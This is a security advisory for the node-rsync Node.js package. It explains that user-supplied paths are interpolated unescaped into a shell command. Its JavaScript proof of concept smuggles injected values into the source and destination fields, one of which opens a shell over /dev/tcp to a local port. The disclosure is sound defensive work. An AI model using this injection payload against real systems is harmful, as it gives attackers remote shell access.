Arbitrary Command Injection Affecting node-rsync package, versions *
Threat Intelligence
Exploit Maturity: Proof of concept
- Snyk ID SNYK-JS-NODERSYNC-568773
- published 21 Jun 2020
- disclosed 7 May 2020
- credit Mik317
How to fix?
There is no fixed version for node-rsync.
Overview
node-rsync is an rsync wrapper for Node.js.
Affected versions of this package are vulnerable to Arbitrary Command Injection. The issue occurs because user-supplied values (such as the source and destination paths) are interpolated into a shell command string that is then executed without any validation or escaping, so shell metacharacters in those values are interpreted by the shell.
PoC By Snyk Security Team
// Build the command (the package is loaded under the name the advisory uses)
var Rsync = require('node-rsync');
var rsync = new Rsync()
  .shell('ssh')
  .flags('az')
  .source(';/path/to/source')
  .destination('&sh</dev/tcp/127.0.0.1/4444');
// Execute the command; the callback receives the exact command string that was run
rsync.execute(function (error, code, cmd) {
  console.log(cmd);
});
CVSS Scores
version 3.1